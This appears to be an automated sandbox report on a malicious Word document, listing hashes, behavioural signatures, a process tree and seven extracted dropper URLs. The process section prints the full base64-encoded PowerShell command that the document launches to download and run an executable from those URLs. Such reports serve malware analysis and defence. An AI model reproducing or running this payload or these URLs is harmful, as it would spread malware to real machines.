Analysis

  • max time kernel
    146s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-04-2024 22:37

General

  • Target

    03c90fad1add214ac84f7bcdc95926c7_JaffaCakes118.doc

  • Size

    163KB

  • MD5

    03c90fad1add214ac84f7bcdc95926c7

  • SHA1

    7a8b357f2fc59502dcf55c024bbf13f1fcf9f030

  • SHA256

    09051e666613cdf9cd4b98d12912872d527076c6aa5caaadcd25b1162da2744a

  • SHA512

    3bce68efae5bc16dd2793b92407cfdf16a5ea9b2b09169e975adc20ecce6a1124cc2cb04f78aa545ed73c9512d24625178a92a8f8fceba82b64108c2b76ccec9

  • SSDEEP

    1536:VAhXAhordi1Ir77zOH98Wj2gpngN+a95ay9y0J6f264N/k:mrfrzOH98ipgrPJ6fQ/k

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.yusukelife.com/wp/ure/

exe.dropper

https://www.ingyouth.com/wp-includes/0zCW/

exe.dropper

http://alphapharma247.com/wp-content/plugins/r/

exe.dropper

http://muanha24h.com/wp-content/fHS7/

exe.dropper

http://buyhacks.net/wp-content/jgLqdhk/

exe.dropper

https://comsotaque.com/wp-includes/5i/

exe.dropper

https://qualitychildcarepreschool.com/emqblk/Ik2D/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\03c90fad1add214ac84f7bcdc95926c7_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3392
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e JABXAHUAawBkAGYAaQAzAD0AKAAnAFMAcQAnACsAKAAnAHAAJwArACcAOQBpAHQAJwApACsAJwBzACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBTAGUAUgBQAHIATwBmAGkAbABFAFwAcABUADEANgBWAGkANgBcAGIAUABNAGkANQBBAHMAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBDAHQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAGAAQwBVAHIAYABJAHQAeQBQAFIAbwB0AGAAbwBjAE8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAnACkAKwAnACwAIAAnACsAKAAnAHQAJwArACcAbABzADEAJwApACsAKAAnADEAJwArACcALAAnACsAJwAgAHQAbABzACcAKQApADsAJABIAHIAMQB0AHEAdwA5ACAAPQAgACgAJwBYADUAJwArACgAJwB3ADYAegAnACsAJwBsAHMAJwApACkAOwAkAEUAXwB1AF8AdwB4AGQAPQAoACgAJwBaAGMAJwArACcAeQA4ACcAKQArACcAbAA1ACcAKwAnADEAJwApADsAJABLAGEANgB4AHAAMAA3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnADkAVAAnACsAKAAnAHkAJwArACcAUAB0ADEANgAnACsAJwB2ACcAKQArACcAaQAnACsAKAAnADYAJwArACcAOQBUACcAKQArACgAJwB5AEIAcABtAGkANQAnACsAJwBhAHMAJwArACcAOQBUAHkAJwApACkALQBjAFIARQBwAEwAQQBjAEUAIAAoACcAOQAnACsAJwBUAHkAJwApACwAWwBDAGgAYQBSAF0AOQAyACkAKwAkAEgAcgAxAHQAcQB3ADkAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABUADkAZQBlADQAOQB3AD0AKAAoACcAWQAnACsAJwAwAG0AYQAnACkAKwAoACcAcAAnACsAJwB4ADAAJwApACkAOwAkAEIAXwB4AHoAZQBhADYAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4ARQBUAC4AdwBFAGIAQwBMAGkAZQBuAHQAOwAkAFMAdgBuAHoAbwAwAGMAPQAoACcAaAB0ACcAKwAoACcAdABwADoALwAnACsAJwAvACcAKwAnAHcAdwAnACkAKwAnAHcALgAnACsAJwB5AHUAJwArACgAJwBzACcAKwAnAHUAawBlAGwAJwApACsAKAAnAGkAJwArACcAZgBlAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AJwApACsAJwB3AHAAJwArACgAJwAvAHUAJwArACcAcgBlACcAKwAnAC8AKgAnACkAKwAnAGgAJwArACgAJwB0AHQAcABzADoAJwArACcALwAnACkAKwAnAC8AJwArACcAdwAnACsAJwB3AHcAJwArACgAJwAuAGkAbgBnACcAKwAnAHkAbwB1ACcAKQArACgAJwB0AGgAJwArACcALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3AHAAJwApACsAJwAtAGkAJwArACcAbgAnACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACkAKwAoACcAcwAvACcAKwAnADAAegBDAFcALwAnACkAKwAnACoAJwArACcAaAAnACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoALwAnACkAKwAnAC8AJwArACcAYQBsACcAKwAoACcAcAAnACsAJwBoAGEAJwApACsAKAAnAHAAJwArACcAaABhAHIAbQBhADIAJwApACsAKAAnADQANwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKwAnAC0AJwApACsAJwBjAG8AJwArACcAbgAnACsAKAAnAHQAZQAnACsAJwBuAHQALwBwAGwAJwApACsAJwB1ACcAKwAnAGcAJwArACgAJwBpAG4AJwArACcAcwAvAHIAJwArACcALwAnACsAJwAqAGgAdAAnACkAKwAoACcAdAAnACsAJwBwADoALwAvACcAKQArACgAJwBtAHUAJwArACcAYQAnACkAKwAnAG4AJwArACcAaAAnACsAJwBhACcAKwAoACcAMgA0AGgAJwArACcALgAnACsAJwBjAG8AbQAnACsAJwAvAHcAcAAtAGMAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAJwApACsAJwBuACcAKwAoACcAdAAvAGYASAAnACsAJwBTACcAKQArACgAJwA3AC8AJwArACcAKgBoAHQAJwApACsAJwB0ACcAKwAnAHAAOgAnACsAKAAnAC8ALwAnACsAJwBiAHUAJwApACsAJwB5AGgAJwArACgAJwBhAGMAJwArACcAawBzACcAKQArACgAJwAuACcAKwAnAG4AJwArACcAZQB0AC8AdwBwAC0AYwBvAG4AJwArACcAdAAnACsAJwBlACcAKQArACcAbgAnACsAJwB0ACcAKwAnAC8AJwArACgAJwBqACcAKwAnAGcATAAnACkAKwAoACcAcQBkAGgAawAnACsAJwAvACcAKQArACcAKgBoACcAKwAnAHQAdAAnACsAJwBwAHMAJwArACgAJwA6AC8ALwAnACsAJwBjAG8AJwApACsAJwBtAHMAJwArACgAJwBvACcAKwAnAHQAYQBxAHUAZQAuACcAKwAnAGMAbwBtACcAKQArACgAJwAvAHcAJwArACcAcAAtAGkAbgAnACsAJwBjAGwAJwApACsAKAAnAHUAZABlACcAKwAnAHMAJwApACsAJwAvADUAJwArACcAaQAnACsAJwAvACoAJwArACgAJwBoAHQAdABwAHMAJwArACcAOgAnACsAJwAvACcAKQArACcALwBxACcAKwAnAHUAYQAnACsAJwBsACcAKwAoACcAaQAnACsAJwB0AHkAJwApACsAKAAnAGMAJwArACcAaABpAGwAZAAnACkAKwAnAGMAJwArACgAJwBhAHIAJwArACcAZQAnACkAKwAoACcAcAAnACsAJwByAGUAcwAnACkAKwAnAGMAaAAnACsAJwBvACcAKwAnAG8AbAAnACsAJwAuAGMAJwArACgAJwBvAG0AJwArACcALwBlAG0AcQAnACsAJwBiAGwAJwArACcAawAvAEkAJwApACsAKAAnAGsAJwArACcAMgBEAC8AJwApACkALgAiAFMAcABsAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQgBkADAAZgB5ADMAZgA9ACgAJwBKACcAKwAnAGYAMAAnACsAKAAnAGYANwAnACsAJwB3AGMAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABaADYAegBoAG8AbwBmACAAaQBuACAAJABTAHYAbgB6AG8AMABjACkAewB0AHIAeQB7ACQAQgBfAHgAegBlAGEANgAuACIAZABPAFcAYABOAGAAbABvAGAAQQBkAEYASQBMAEUAIgAoACQAWgA2AHoAaABvAG8AZgAsACAAJABLAGEANgB4AHAAMAA3ACkAOwAkAEMAaQBkADIAZwBuAG8APQAoACgAJwBLAGEAYwAnACsAJwB5ACcAKwAnAGsAYwAnACkAKwAnADYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0AJwArACcASQB0AGUAbQAnACkAIAAkAEsAYQA2AHgAcAAwADcAKQAuACIAbABgAEUATgBgAEcAVABIACIAIAAtAGcAZQAgADIANgA0ADMANAApACAAewAuACgAJwBJACcAKwAnAG4AJwArACcAdgBvAGsAJwArACcAZQAtAEkAdABlAG0AJwApACgAJABLAGEANgB4AHAAMAA3ACkAOwAkAEQANgBpADcAdQAxAF8APQAoACcAQgAzACcAKwAoACcAeQAwACcAKwAnAHEAeQBsACcAKQApADsAYgByAGUAYQBrADsAJABIADgAZwB1AGgAbgB6AD0AKAAnAFMAMwAnACsAKAAnAHgAMQBzACcAKwAnADMAJwApACsAJwBrACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBiADIAMwA2AGcAdAA9ACgAKAAnAEMAJwArACcAMABlACcAKQArACcAdwAyACcAKwAnAGoAOQAnACkA
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3152
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1400 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:1060

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_usq30e1w.db5.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\pT16Vi6\bPMi5As\X5w6zls.exe

      Filesize

      30KB

      MD5

      a74b3e7dc8ea11acc6dbd9a9c0eec61b

      SHA1

      460bed14af275d52dc46bbd679b9a44964abc890

      SHA256

      8cfb282730d02d05f99f94b89bae8ac023b056d3e8101b7bb93093bbd55b6768

      SHA512

      6005b142c1baad93641fc7a63858a89db35881897479095565f70e0f54ae0e42202e18f2a2b3da3472efe6ee4db10ed2a7d895faef6bb19d952abd4562f3402d

    • memory/3152-99-0x00007FF96D020000-0x00007FF96DAE1000-memory.dmp

      Filesize

      10.8MB

    • memory/3152-78-0x00007FF96D020000-0x00007FF96DAE1000-memory.dmp

      Filesize

      10.8MB

    • memory/3152-77-0x0000015068420000-0x0000015068442000-memory.dmp

      Filesize

      136KB

    • memory/3392-18-0x00007FF9581B0000-0x00007FF9581C0000-memory.dmp

      Filesize

      64KB

    • memory/3392-1-0x00007FF95AB10000-0x00007FF95AB20000-memory.dmp

      Filesize

      64KB

    • memory/3392-7-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-8-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-9-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-10-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-11-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-13-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-16-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-17-0x00007FF9581B0000-0x00007FF9581C0000-memory.dmp

      Filesize

      64KB

    • memory/3392-15-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-14-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-12-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-0-0x00007FF95AB10000-0x00007FF95AB20000-memory.dmp

      Filesize

      64KB

    • memory/3392-30-0x0000021A01230000-0x0000021A02200000-memory.dmp

      Filesize

      15.8MB

    • memory/3392-31-0x0000021A05630000-0x0000021A05830000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-67-0x0000021A7C190000-0x0000021A7C990000-memory.dmp

      Filesize

      8.0MB

    • memory/3392-6-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-3-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-5-0x00007FF95AB10000-0x00007FF95AB20000-memory.dmp

      Filesize

      64KB

    • memory/3392-82-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-85-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-86-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-4-0x00007FF95AB10000-0x00007FF95AB20000-memory.dmp

      Filesize

      64KB

    • memory/3392-2-0x00007FF95AB10000-0x00007FF95AB20000-memory.dmp

      Filesize

      64KB

    • memory/3392-100-0x0000021A01230000-0x0000021A02200000-memory.dmp

      Filesize

      15.8MB

    • memory/3392-101-0x0000021A05630000-0x0000021A05830000-memory.dmp

      Filesize

      2.0MB

    • memory/3392-102-0x0000021A7C190000-0x0000021A7C990000-memory.dmp

      Filesize

      8.0MB

    • memory/3392-122-0x00007FF95AB10000-0x00007FF95AB20000-memory.dmp

      Filesize

      64KB

    • memory/3392-123-0x00007FF95AB10000-0x00007FF95AB20000-memory.dmp

      Filesize

      64KB

    • memory/3392-125-0x00007FF95AB10000-0x00007FF95AB20000-memory.dmp

      Filesize

      64KB

    • memory/3392-124-0x00007FF95AB10000-0x00007FF95AB20000-memory.dmp

      Filesize

      64KB

    • memory/3392-126-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

      Filesize

      2.0MB